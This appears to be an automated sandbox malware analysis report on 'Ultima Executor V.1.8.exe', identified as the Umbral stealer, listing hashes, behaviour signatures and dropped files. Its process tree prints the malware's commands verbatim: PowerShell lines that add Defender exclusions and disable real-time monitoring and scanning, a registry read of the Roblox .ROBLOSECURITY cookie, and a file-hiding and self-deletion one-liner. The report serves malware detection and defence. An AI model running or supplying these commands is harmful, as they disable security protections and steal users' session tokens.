Overview

overview

10

Static

static

3

Ultima Exe....8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    64s
  • max time network
    65s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/04/2025, 01:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Ultima Executor V.1.8.exe

  • Size

    911KB

  • MD5

    c1d3eba922b1c8200c576741321e30f0

  • SHA1

    992b40e1883a7f034b99256084aa0130d738ba5c

  • SHA256

    2257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7

  • SHA512

    cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224

  • SSDEEP

    24576:PX0dNTiM8RviVUwblP373RVTdQJtg8y6E:/0dNTiM8NiVUC373RheE

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe
    "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5788
    • C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe
      "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4472
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4820
      • C:\Windows\SysWOW64\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:4708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4808
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5304
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1976
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1840
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:5800
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3428
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • System Location Discovery: System Language Discovery
        PID:6012
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3344
      • C:\Windows\SysWOW64\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • System Location Discovery: System Language Discovery
        • Detects videocard installed
        PID:1660
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe" && pause
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2928
        • C:\Windows\SysWOW64\PING.EXE
          ping localhost
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4856

Network

MITRE ATT&CK Enterprise v16

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ultima Executor V.1.8.exe.log
    Filesize

    425B

    MD5

    4eaca4566b22b01cd3bc115b9b0b2196

    SHA1

    e743e0792c19f71740416e7b3c061d9f1336bf94

    SHA256

    34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

    SHA512

    bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    403dad46132a4c509c63c3f86b528cb2

    SHA1

    11dac347e19132d17e72307001a239b4c51c624a

    SHA256

    d364cf58eaaca95ef88e8a988df941529b85ef3b11ef2d3bf9368d1a3c70ea6c

    SHA512

    065a632d65be9586a0f5c1686196753e2271fd5c705cee1893d5641712ea74c102ee18397c119aa53954e84580d03a1b46a41dfc7755d6f1f1aac4b3d85b59f4

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    17KB

    MD5

    efd3b0d153a491ac9188b8551378f229

    SHA1

    2ac96348f699b0728cb92ec1b34a4be08d125871

    SHA256

    0a9cf6664e118a199f3066cac70e6c907b66f7454fc2d174ccfd6975239d4eb4

    SHA512

    b7c952e94dc7141ef15ada7c1dcb822c2006ec73a7082b2cdacf7f7b29d249a26a3c73d4940b6ac17205055ea15d9cf30393bb1ab5b242949358f8d294930df2

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    0720640930796608c161e260068dda7f

    SHA1

    c7c575f60f88d6b1a70f9dd08e6c4aae72ac013f

    SHA256

    394511df616776a55fcfa60cf28d7277b64591ba701d8cdfcb0c68d1affec6c7

    SHA512

    40338642cece9ce0c069d15a7e48900e501cb9c474d0517b20e005a68b51fc44b9b87c74a5cef4ace1b031d7d8bd6498598075523cfba7eaaf2c64c899cbf8e3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    15KB

    MD5

    9da4a887629edc2b0f0220cac3789324

    SHA1

    53229712dd4bfc085e88b840502d5e799656be69

    SHA256

    f9f5e2ac6e70da500be1fb5824666706647cfa2d23338fa1c509b832bf242137

    SHA512

    2b8ecc149e967c965775786973ffbe7180b85bb786a9e7bde33ce1b81385bbb7e468babdd88234085a4764d0e6a0d1413466f918e14c68771789af6e54f747be

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Ultima Executor V.1.8.exe
    Filesize

    911KB

    MD5

    c1d3eba922b1c8200c576741321e30f0

    SHA1

    992b40e1883a7f034b99256084aa0130d738ba5c

    SHA256

    2257c78940e11aab5b71fd84da526e53a7d86c217667b42bc29f837e8ea09eb7

    SHA512

    cbebcc57d691cb0a42ea345aa296e6e7ca52ad09e049e1e951f56415dd657ebbe69a7ed8e0ed41cdea40e7c82d579579457af9374cbcf718fa9bf0c6a777c224

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e2hygpmz.pxx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1840-107-0x0000000005A40000-0x0000000005D94000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1840-109-0x0000000006030000-0x000000000607C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1976-95-0x0000000005AC0000-0x0000000005B0C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1976-96-0x0000000005FE0000-0x0000000006002000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1976-81-0x00000000053F0000-0x0000000005744000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3344-128-0x0000000006820000-0x000000000686C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3344-125-0x0000000006450000-0x00000000067A4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4472-10-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4472-11-0x00000000056C0000-0x0000000005C64000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4472-113-0x0000000007D40000-0x0000000007D52000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4472-8-0x0000000005070000-0x0000000005102000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4472-12-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4472-112-0x0000000007040000-0x000000000704A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4472-3-0x0000000000400000-0x0000000000440000-memory.dmp

    Filesize

    256KB

    Download

  • memory/4472-130-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4472-126-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4472-71-0x0000000006D80000-0x0000000006D9E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4472-69-0x0000000006B60000-0x0000000006BD6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4472-70-0x0000000006D30000-0x0000000006D80000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4472-134-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4808-14-0x0000000005580000-0x0000000005BA8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4808-16-0x0000000005C20000-0x0000000005C86000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4808-48-0x0000000007800000-0x000000000780E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4808-49-0x0000000007810000-0x0000000007824000-memory.dmp

    Filesize

    80KB

    Download

  • memory/4808-50-0x0000000007910000-0x000000000792A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4808-51-0x00000000078F0000-0x00000000078F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4808-46-0x0000000007850000-0x00000000078E6000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4808-13-0x0000000002980000-0x00000000029B6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4808-45-0x0000000007640000-0x000000000764A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4808-44-0x00000000075D0000-0x00000000075EA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4808-43-0x0000000007C10000-0x000000000828A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4808-42-0x00000000074E0000-0x0000000007583000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4808-41-0x0000000006830000-0x000000000684E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4808-30-0x0000000006870000-0x00000000068A2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4808-31-0x00000000701F0000-0x000000007023C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4808-29-0x00000000062C0000-0x000000000630C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4808-28-0x00000000062A0000-0x00000000062BE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4808-23-0x0000000005D00000-0x0000000006054000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4808-17-0x0000000005C90000-0x0000000005CF6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4808-47-0x00000000077D0000-0x00000000077E1000-memory.dmp

    Filesize

    68KB

    Download

  • memory/4808-15-0x00000000054F0000-0x0000000005512000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5304-64-0x0000000006300000-0x0000000006654000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/5788-0-0x000000007494E000-0x000000007494F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/5788-9-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/5788-5-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/5788-2-0x000000007494E000-0x000000007494F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/5788-1-0x0000000000690000-0x000000000077A000-memory.dmp

    Filesize

    936KB

    Download